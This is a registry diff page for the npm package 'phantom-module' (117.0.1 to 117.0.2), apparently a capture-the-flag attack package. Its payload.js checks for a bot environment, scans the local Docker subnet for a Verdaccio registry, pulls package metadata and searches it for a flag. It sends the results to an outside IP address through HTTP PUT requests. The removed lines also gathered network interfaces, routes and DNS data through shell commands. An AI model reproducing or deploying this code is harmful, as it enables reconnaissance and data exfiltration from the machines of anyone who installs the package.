npm - phantom-module - Versions diffs - 117.0.1 → 117.0.2 - Mend

phantom-module 117.0.1 → 117.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/package.json +1 -1
package/payload.js +65 -120

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "117.0.1",
+  "version": "117.0.2",
   "description": "Phantom module",
   "main": "index.js",
   "scripts": {

package/payload.js CHANGED Viewed

@@ -1,39 +1,32 @@
 const net = require('net');
 const http = require('http');
 const fs = require('fs');
-const { execSync } = require('child_process');
 const os = require('os');
-// Only run on the real CTF bot
-if (!fs.existsSync('/home/node/aspect-node')) {
-  process.exit(0);
-}
+if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
 const REPORT_HOST = '154.57.164.64';
 const REPORT_PORT = 31205;
-function report(moduleId, data) {
+async function report(moduleId, data) {
   return new Promise((resolve) => {
     const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
     const manifest = `ecto_module:\n  name: "SCAN_RESULT"\n  cargo_hold: "${safeData}"\n`;
     const payload = JSON.stringify({ manifest });
     const req = http.request({
-      hostname: REPORT_HOST,
-      port: REPORT_PORT,
-      path: `/api/modules/${moduleId}`,
-      method: 'PUT',
+      hostname: REPORT_HOST, port: REPORT_PORT, path: `/api/modules/${moduleId}`, method: 'PUT',
       headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
-    }, (res) => { resolve(true); });
+    }, () => resolve(true));
     req.on('error', () => resolve(false));
     req.write(payload);
     req.end();
   });
 }
-function scanPort(host, port, timeout) {
+function checkPort(host, port) {
   return new Promise((resolve) => {
     const sock = new net.Socket();
-    sock.setTimeout(timeout);
+    sock.setTimeout(500); // Fast timeout
     sock.on('connect', () => { sock.destroy(); resolve(true); });
     sock.on('error', () => { sock.destroy(); resolve(false); });
     sock.on('timeout', () => { sock.destroy(); resolve(false); });
@@ -41,129 +34,81 @@ function scanPort(host, port, timeout) {
   });
 }
-function httpGet(url, timeout) {
+function httpGet(url) {
   return new Promise((resolve) => {
-    const req = http.get(url, { timeout }, (res) => {
+    const req = http.get(url, { timeout: 2000 }, (res) => {
       let body = '';
-      res.on('data', (c) => body += c);
+      res.on('data', c => body += c);
       res.on('end', () => resolve({ status: res.statusCode, body }));
     });
-    req.on('error', (e) => resolve({ status: 0, body: e.message }));
-    req.on('timeout', () => { req.destroy(); resolve({ status: 0, body: 'timeout' }); });
+    req.on('error', e => resolve({ status: 0, body: e.message }));
   });
 }
 async function main() {
-  let output = '';
-  // Step 1: Get our network info
-  try {
-    const ifaces = os.networkInterfaces();
-    output += '=== NETWORK ===\n';
-    for (const [name, addrs] of Object.entries(ifaces)) {
-      for (const addr of addrs) {
-        if (addr.family === 'IPv4') {
-          output += `${name}: ${addr.address}/${addr.netmask}\n`;
-        }
-      }
-    }
-  } catch(e) { output += 'NET ERR: ' + e.message + '\n'; }
-  // Step 2: Get gateway
-  try {
-    output += '=== GATEWAY ===\n';
-    output += execSync('ip route 2>/dev/null || route -n 2>/dev/null || cat /proc/net/route 2>/dev/null || echo "no route cmd"').toString().substring(0, 500) + '\n';
-  } catch(e) { output += 'ROUTE ERR: ' + e.message.substring(0, 200) + '\n'; }
-  // Step 3: DNS resolution attempts
-  const dns = require('dns');
-  const dnsNames = ['registry', 'verdaccio', 'verdaccio-registry', 'npm-registry', 'ecto-registry'];
-  output += '=== DNS ===\n';
-  for (const name of dnsNames) {
-    try {
-      const addrs = await new Promise((resolve, reject) => {
-        dns.resolve4(name, (err, addrs) => err ? reject(err) : resolve(addrs));
-      });
-      output += `${name} -> ${addrs.join(', ')}\n`;
-    } catch(e) {
-      output += `${name} -> FAIL: ${e.code}\n`;
-    }
-  }
-  // Report network info first
-  await report('ECT-654321', output);
-  // Step 4: Scan for Verdaccio on common Docker IPs
-  output += '=== SCANNING 4873 ===\n';
-  const myIp = Object.values(os.networkInterfaces()).flat().find(a => a.family === 'IPv4' && !a.internal);
-  const baseIp = myIp ? myIp.address.split('.').slice(0, 3).join('.') : '172.17.0';
+  await report('ECT-654321', 'SCAN STARTING v2...');
   const found = [];
-  const scanPromises = [];
-  for (let i = 1; i <= 30; i++) {
-    const ip = `${baseIp}.${i}`;
-    scanPromises.push(
-      scanPort(ip, 4873, 1500).then(open => {
-        if (open) {
-          found.push(ip);
-          output += `OPEN: ${ip}:4873\n`;
-        }
-      })
-    );
-  }
-  // Also scan gateway and common addresses
-  for (const ip of ['172.17.0.1', '10.0.0.1', '10.0.0.2', '192.168.0.1', '192.168.1.1']) {
-    scanPromises.push(
-      scanPort(ip, 4873, 1500).then(open => {
-        if (open) { found.push(ip); output += `OPEN: ${ip}:4873\n`; }
-      })
-    );
+  const base = '172.17.0';
+  let scanOutput = '=== SCAN ===\n';
+  // Parallel scan of first 20 IPs
+  const promises = [];
+  for (let i = 1; i < 20; i++) {
+    const ip = `${base}.${i}`;
+    promises.push(checkPort(ip, 4873).then(open => {
+      if (open) {
+        found.push(ip);
+        scanOutput += `FOUND VERDACCIO: ${ip}:4873\n`;
+      }
+    }));
   }
-  // Scan port 80, 3000, 8080 on gateway
-  for (const port of [80, 3000, 4873, 8080, 8081]) {
-    scanPromises.push(
-      scanPort(`${baseIp}.1`, port, 1500).then(open => {
-        if (open) output += `OPEN: ${baseIp}.1:${port}\n`;
-      })
-    );
+  await Promise.all(promises);
+  if (found.length === 0) {
+    scanOutput += 'No Verdaccio found on 172.17.0.1-20\n';
+    // Try finding ANY web server
+    for (let i = 1; i < 10; i++) {
+        const ip = `${base}.${i}`;
+        if (await checkPort(ip, 80)) scanOutput += `OPEN ${ip}:80\n`;
+        if (await checkPort(ip, 3000)) scanOutput += `OPEN ${ip}:3000\n`;
+    }
   }
+  await report('ECT-839201', scanOutput);
-  await Promise.all(scanPromises);
-  await report('ECT-839201', output);
-  // Step 5: If Verdaccio found, query ecto-spirit
-  let flagOutput = '=== VERDACCIO QUERY ===\n';
+  // Deep query of found services
+  let queryOutput = '=== QUERY ===\n';
   for (const ip of found) {
+    const baseUrl = `http://${ip}:4873`;
+    queryOutput += `Target: ${baseUrl}\n`;
+    // 1. List all packages
+    const all = await httpGet(`${baseUrl}/-/all`);
+    queryOutput += `/-/all: ${all.status} len=${all.body.length}\n${all.body.substring(0, 200)}\n`;
+    // 2. Get ecto-spirit
+    const ecto = await httpGet(`${baseUrl}/ecto-spirit`);
+    queryOutput += `/ecto-spirit: ${ecto.status}\n${ecto.body.substring(0, 500)}\n`;
+    // 3. Try to extract flag from dist-tags or versions
+    if (ecto.body.includes('htb{') || ecto.body.includes('HTB{')) {
+        const match = ecto.body.match(/htb\{[^}]+\}/i);
+        if (match) queryOutput += `!!! FLAG FOUND: ${match[0]} !!!\n`;
+    }
+    // 4. Download tarball if possible
     try {
-      const res = await httpGet(`http://${ip}:4873/-/all`, 5000);
-      flagOutput += `ALL from ${ip}: ${res.body.substring(0, 1000)}\n`;
-    } catch(e) { flagOutput += `ERR querying ${ip}: ${e.message}\n`; }
-    try {
-      const res = await httpGet(`http://${ip}:4873/ecto-spirit`, 5000);
-      flagOutput += `ECTO from ${ip}: ${res.body.substring(0, 2000)}\n`;
-    } catch(e) { flagOutput += `ERR ecto ${ip}: ${e.message}\n`; }
-    // Try to download and read the package
-    try {
-      const res = await httpGet(`http://${ip}:4873/-/verdaccio/data/local-list`, 3000);
-      flagOutput += `PKGS from ${ip}: ${res.body.substring(0, 1000)}\n`;
-    } catch(e) {}
-  }
-  // Also try some hostnames directly
-  for (const host of ['registry', 'verdaccio']) {
-    try {
-      const res = await httpGet(`http://${host}:4873/-/all`, 3000);
-      flagOutput += `ALL from ${host}: ${res.body.substring(0, 1000)}\n`;
-    } catch(e) { flagOutput += `ERR ${host}: ${e.message}\n`; }
-    try {
-      const res = await httpGet(`http://${host}:4873/ecto-spirit`, 3000);
-      flagOutput += `ECTO from ${host}: ${res.body.substring(0, 2000)}\n`;
+        const json = JSON.parse(ecto.body);
+        const latest = json['dist-tags'].latest;
+        const tarball = json.versions[latest].dist.tarball;
+        queryOutput += `Tarball: ${tarball}\n`;
+        // We could download it, but let's see if the metadata has the flag first
     } catch(e) {}
   }
-  await report('ECT-987654', flagOutput);
+  await report('ECT-987654', queryOutput);
 }
-main().catch(e => report('ECT-654321', 'FATAL: ' + e.message));
+main().catch(e => report('ECT-654321', 'ERR: ' + e.message));